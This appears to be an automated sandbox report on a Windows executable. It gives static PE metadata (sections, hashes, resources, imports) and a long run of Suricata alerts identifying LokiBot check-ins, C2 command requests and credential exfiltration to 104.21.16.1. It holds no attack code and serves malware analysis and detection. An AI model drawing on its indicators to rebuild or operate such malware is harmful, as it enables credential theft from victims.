IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4870	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dcc4	0x8de00	d28a820a1d9ff26cda02d12b888ba4b4	False	0.5728679102422908	data	6.676118058520316	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2e10e	0x2e200	79b14b254506b0dbc8cd0ad67fb70ad9	False	0.33535526761517614	OpenPGP Public Key	5.76010872795207	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbe000	0x8f74	0x5200	9f9d6f746f1a415a63de45f8b7983d33	False	0.1017530487804878	data	1.198745897703538	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc7000	0x29bd4	0x29c00	e68d1f077802cbe4f05f00e06fb1bebb	False	0.8434693113772455	data	7.667252023436939	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xf1000	0x711c	0x7200	6fcae3cbbf6bfbabf5ec5bbe7cf612c3	False	0.7650767543859649	data	6.779031650454199	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc75a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc76d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc77f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc7920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc7c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc7d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc8bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xc9480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xc99e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xcbf90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xcd038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xcd4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xcd4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcda84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xce110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xce5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xceb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xcf1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xcf660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xcf7b8	0x20e9b	data			1.0003783074081491
RT_GROUP_ICON	0xf0654	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0xf06cc	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0xf06e0	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0xf06f4	0x14	data	English	Great Britain	1.25
RT_VERSION	0xf0708	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0xf07e4	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Version Infos

Description	Data
Translation	0x0809 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-03-06T04:03:45.735358+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49709	104.21.16.1	80	TCP
2025-03-06T04:03:45.735358+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49709	104.21.16.1	80	TCP
2025-03-06T04:03:45.735358+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49709	104.21.16.1	80	TCP
2025-03-06T04:03:46.500574+0100	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.6	49709	104.21.16.1	80	TCP
2025-03-06T04:03:47.665765+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49710	104.21.16.1	80	TCP
2025-03-06T04:03:47.665765+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49710	104.21.16.1	80	TCP
2025-03-06T04:03:47.665765+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49710	104.21.16.1	80	TCP
2025-03-06T04:03:48.473141+0100	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.6	49710	104.21.16.1	80	TCP
2025-03-06T04:03:48.542508+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49711	104.21.16.1	80	TCP
2025-03-06T04:03:48.542508+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49711	104.21.16.1	80	TCP
2025-03-06T04:03:48.542508+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49711	104.21.16.1	80	TCP
2025-03-06T04:03:49.277970+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49711	104.21.16.1	80	TCP
2025-03-06T04:03:50.566688+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49713	104.21.16.1	80	TCP
2025-03-06T04:03:50.566688+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49713	104.21.16.1	80	TCP
2025-03-06T04:03:50.566688+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49713	104.21.16.1	80	TCP
2025-03-06T04:03:51.278511+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49713	104.21.16.1	80	TCP
2025-03-06T04:03:52.446459+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49714	104.21.16.1	80	TCP
2025-03-06T04:03:52.446459+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49714	104.21.16.1	80	TCP
2025-03-06T04:03:52.446459+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49714	104.21.16.1	80	TCP
2025-03-06T04:03:53.201624+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49714	104.21.16.1	80	TCP
2025-03-06T04:03:53.206639+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.16.1	80	192.168.2.6	49714	TCP
2025-03-06T04:03:54.361622+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49720	104.21.16.1	80	TCP
2025-03-06T04:03:54.361622+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49720	104.21.16.1	80	TCP
2025-03-06T04:03:54.361622+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49720	104.21.16.1	80	TCP
2025-03-06T04:03:55.123302+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49720	104.21.16.1	80	TCP
2025-03-06T04:03:55.128414+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.16.1	80	192.168.2.6	49720	TCP
2025-03-06T04:03:56.390014+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49726	104.21.16.1	80	TCP
2025-03-06T04:03:56.390014+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49726	104.21.16.1	80	TCP
2025-03-06T04:03:56.390014+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49726	104.21.16.1	80	TCP
2025-03-06T04:03:57.147922+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49726	104.21.16.1	80	TCP
2025-03-06T04:03:57.153017+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.16.1	80	192.168.2.6	49726	TCP
2025-03-06T04:03:58.316473+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49732	104.21.16.1	80	TCP
2025-03-06T04:03:58.316473+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49732	104.21.16.1	80	TCP
2025-03-06T04:03:58.316473+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49732	104.21.16.1	80	TCP
2025-03-06T04:03:59.026601+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49732	104.21.16.1	80	TCP
2025-03-06T04:04:00.195263+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49737	104.21.16.1	80	TCP
2025-03-06T04:04:00.195263+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49737	104.21.16.1	80	TCP
2025-03-06T04:04:00.195263+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49737	104.21.16.1	80	TCP
2025-03-06T04:04:00.976832+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49737	104.21.16.1	80	TCP
2025-03-06T04:04:00.981839+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.16.1	80	192.168.2.6	49737	TCP
2025-03-06T04:04:02.151058+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49742	104.21.16.1	80	TCP
2025-03-06T04:04:02.151058+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49742	104.21.16.1	80	TCP
2025-03-06T04:04:02.151058+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49742	104.21.16.1	80	TCP
2025-03-06T04:04:02.919705+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49742	104.21.16.1	80	TCP
2025-03-06T04:04:02.979119+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.16.1	80	192.168.2.6	49742	TCP
2025-03-06T04:04:04.265359+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49749	104.21.16.1	80	TCP
2025-03-06T04:04:04.265359+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49749	104.21.16.1	80	TCP
2025-03-06T04:04:04.265359+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49749	104.21.16.1	80	TCP
2025-03-06T04:04:05.043190+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49749	104.21.16.1	80	TCP
2025-03-06T04:04:05.048261+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.16.1	80	192.168.2.6	49749	TCP
2025-03-06T04:04:06.201744+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49755	104.21.16.1	80	TCP
2025-03-06T04:04:06.201744+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49755	104.21.16.1	80	TCP
2025-03-06T04:04:06.201744+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49755	104.21.16.1	80	TCP
2025-03-06T04:04:06.955414+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49755	104.21.16.1	80	TCP
2025-03-06T04:04:08.125482+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49761	104.21.16.1	80	TCP
2025-03-06T04:04:08.125482+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49761	104.21.16.1	80	TCP
2025-03-06T04:04:08.125482+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49761	104.21.16.1	80	TCP
2025-03-06T04:04:08.915335+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49761	104.21.16.1	80	TCP
2025-03-06T04:04:08.920417+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.16.1	80	192.168.2.6	49761	TCP
2025-03-06T04:04:10.062674+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49766	104.21.16.1	80	TCP
2025-03-06T04:04:10.062674+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49766	104.21.16.1	80	TCP
2025-03-06T04:04:10.062674+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49766	104.21.16.1	80	TCP
2025-03-06T04:04:10.827213+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49766	104.21.16.1	80	TCP
2025-03-06T04:04:10.832410+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.16.1	80	192.168.2.6	49766	TCP
2025-03-06T04:04:11.988824+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49768	104.21.16.1	80	TCP
2025-03-06T04:04:11.988824+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49768	104.21.16.1	80	TCP
2025-03-06T04:04:11.988824+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49768	104.21.16.1	80	TCP
2025-03-06T04:04:12.615447+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49768	104.21.16.1	80	TCP
2025-03-06T04:04:12.623158+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.16.1	80	192.168.2.6	49768	TCP
2025-03-06T04:04:13.900262+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49774	104.21.16.1	80	TCP
2025-03-06T04:04:13.900262+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49774	104.21.16.1	80	TCP
2025-03-06T04:04:13.900262+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49774	104.21.16.1	80	TCP
2025-03-06T04:04:14.615177+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49774	104.21.16.1	80	TCP
2025-03-06T04:04:15.812629+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49780	104.21.16.1	80	TCP
2025-03-06T04:04:15.812629+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49780	104.21.16.1	80	TCP
2025-03-06T04:04:15.812629+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49780	104.21.16.1	80	TCP
2025-03-06T04:04:16.574300+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49780	104.21.16.1	80	TCP
2025-03-06T04:04:17.719575+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49786	104.21.16.1	80	TCP
2025-03-06T04:04:17.719575+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49786	104.21.16.1	80	TCP
2025-03-06T04:04:17.719575+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49786	104.21.16.1	80	TCP
2025-03-06T04:04:18.464485+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49786	104.21.16.1	80	TCP
2025-03-06T04:04:19.687413+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49790	104.21.16.1	80	TCP
2025-03-06T04:04:19.687413+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49790	104.21.16.1	80	TCP
2025-03-06T04:04:19.687413+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49790	104.21.16.1	80	TCP
2025-03-06T04:04:20.458147+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49790	104.21.16.1	80	TCP
2025-03-06T04:04:20.463127+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.16.1	80	192.168.2.6	49790	TCP
2025-03-06T04:04:21.613325+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49793	104.21.16.1	80	TCP
2025-03-06T04:04:21.613325+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49793	104.21.16.1	80	TCP
2025-03-06T04:04:21.613325+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49793	104.21.16.1	80	TCP
2025-03-06T04:04:22.374598+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49793	104.21.16.1	80	TCP
2025-03-06T04:04:22.379707+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.16.1	80	192.168.2.6	49793	TCP
2025-03-06T04:04:23.536257+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49799	104.21.16.1	80	TCP
2025-03-06T04:04:23.536257+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49799	104.21.16.1	80	TCP
2025-03-06T04:04:23.536257+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49799	104.21.16.1	80	TCP
2025-03-06T04:04:24.265165+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49799	104.21.16.1	80	TCP
2025-03-06T04:04:25.425745+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49805	104.21.16.1	80	TCP
2025-03-06T04:04:25.425745+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49805	104.21.16.1	80	TCP
2025-03-06T04:04:25.425745+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49805	104.21.16.1	80	TCP
2025-03-06T04:04:26.191302+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49805	104.21.16.1	80	TCP
2025-03-06T04:04:26.196280+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.16.1	80	192.168.2.6	49805	TCP
2025-03-06T04:04:27.347257+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49810	104.21.16.1	80	TCP
2025-03-06T04:04:27.347257+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49810	104.21.16.1	80	TCP
